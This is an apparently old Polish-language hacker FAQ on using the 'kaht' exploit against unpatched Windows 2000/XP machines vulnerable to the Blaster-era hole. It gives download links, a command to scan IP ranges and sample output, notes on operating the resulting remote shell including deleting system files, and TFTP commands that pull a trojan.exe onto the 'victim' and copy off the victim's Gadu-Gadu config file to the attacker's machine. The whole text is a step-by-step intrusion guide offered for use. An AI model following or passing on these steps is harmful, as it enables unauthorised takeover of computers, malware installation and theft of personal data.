kaht2.zip

http://www.haxorcitos.com/ficheros/kaht2.zip

1. Co to jest kaht
2. Jak go uzywac
3. Najwazniejsze komendy DOSu
4. Kopiujemy lub wysylamy plik na komputer ofiary

1.
Kaht jest to exploit wykorzystujacy dziure w systemach Windows 2k i XP dziura ta umozliwia przejecie hakerowi pelnej kontroli nad komputerem, na ktorym nie zostala zainstalowana latka na ta dziure. Dziure ta wykorzystuje robak blaster.

2.
A wiec jak go uzyc. Najpierw sciagamy kahta. Rozpakowujemy go do jakiegos folderu np c:kaht Teraz wlaczamy wiersz polecen. Aby to zrobic wciskamy START --} URUCHOM i piszemy: 'cmd' oczywiscie bez cudzyslowu. Pojawia sie nam dosowe okienko. Do obslugi kahta potrzebujemy przynajmniej minimalnej znajomosci komend dosu. Spis najwazniejszych komend zamieszcze w punkcie 3 tego FAQ. No wiec przechodzimy do folderu z kahtem i piszemy:

kaht [IP od ktorego zaczniemy poszukiwanie dziury w systemie] [IP na ktorym zakonczymy poszukiwanie dziury w systemie]

przyklad:
kaht 192.168.0.34 192.168.0.57
ok teraz kaht skanuje podany zakres ip w poszukiwaniu dziur widzimy cos takiego:

- Connecting to 192.168.0.41
Sending Exploit to a [WinXP] Server...FAILED
- Connecting to 192.168.0.46
Sending Exploit to a [WinXP] Server...FAILED
- Connecting to 192.168.0.50
Sending Exploit to a [WinXP] Server...FAILED
- Connecting to 192.168.0.44
Sending Exploit to a [WinXP] Server...FAILED

Oznacza to ze na wszystkich zeskanowanych komputerach jest zainstalowana lata na blastera. Dziwisz sie dlaczego nie zostaly zeskanowane wszystkie komputery z podanego zakresu a tylko cztery?? Dlatego ze pozostale komputery moga byc akurat wylaczone
Ktore komputery sa wlaczone mozemy sprawdzic komenda „net view” w cmd lub konsole.




No dobra jak znajdziemy komputer ktory nie ma zainstalowanej laty to pojawi nam sie cos takiego:




Mamy teraz pelna kontrole nad komputerem. Nie ma takiego luksusu jaki uzyskujemy poslugujac sie Trojanami. Komendy trzeba wpisywac z klawiatury. Spis najwazniejszych komend podany jest w punkcie 3.

3.
Najwazniejsze komendy:

dir - wyswietla spis wszystkich plikow i folderow znajdujacych sie w danym folderze.

cd - umozliwia przejscie do innego folderu {jak jestesmy w folderze C:windows i wpiszemy "cd system32" to przejdziemy do folderu C:windows system32. Jak wpiszemy "cd .." to przechodzimy o jeden stopien nizej czyli z foldery C:windowssystem32 z powrotem znajdziemy sie w folderze C:windows]

del [nazwa pliku] - usuwa podany plik {del c:windowswin.ini}

copy [plik do skopiowania] [plik gdzie ma byc skopiowany] - sluzy do kopiowania plikow, mozna takze zmieniac ich nazwe {copy C:autoexec.bat d:gryautoexec.bat skopiuje plik autoexec.bat do folderu d:gry, aby zmienic nazwe pliku piszemy: "copy C:autoexec.bat d:gryfrajer.txt" nie dosc ze skopiujemy plik do folderu d:gry to na dodatek zmienimy jego nazwe na frajer.txt]

4.
Aby wyslac plik lub skopiowac plik od ofiary bedziemy potrzebowac programu uctftp jest to program ktory zaklada u nas na komputerze serwer TFTP. A wiec sciagamy ten program. Uruchamiamy go. Teraz mamy odpalony na swoim kompie Server. Mozemy wiec sciagac i uploadowac cos od/do naszej ofiary. Uwaga: tam gdzie znajduje sie plik uctftp.exe tam beda sciagac sie pliki i tam musza byc pliki ktore chcesz przeslac!

http://unitedcrew.net/download.php?file=54

aby wgrac komus jakis plik na twardy piszemy:

TFTP -i [swoje IP] GET [nazwa pliku ktory chcemy skopiowac musi on sie znajdowac w folderze serwera TFTP u mnie jest to C:tftp] [nazwa jaka ma miec plik na komputerze ofiary] czyli w naszym przypadku jak chcemy skopiowac ofierze plik trojan.exe to piszemy:

TFTP -i 192.168.0.23 GET trojan.exe C:windowstrojan.exe

Jak chcemy od kogos skopiowac jakis plik wtedy uzywamy tej samej komendy tylko piszemy troche inaczej

TFTP -i [swoje IP] PUT [sciezke do pliku ktory chcemy skopiowac] [nazwa juz skopiowanego pliku] teraz w praktyce wykorzystamy to:

TFTP -i 192.168.0.23 PUT C:gadu-gaduuserslamerconfig.dat config.dat i w rezultacie w folderze C:tftp pojawil nam sie plik config.dat Oczywiscie caly czas musimy miec w tle odpalony program uctftp. Np. :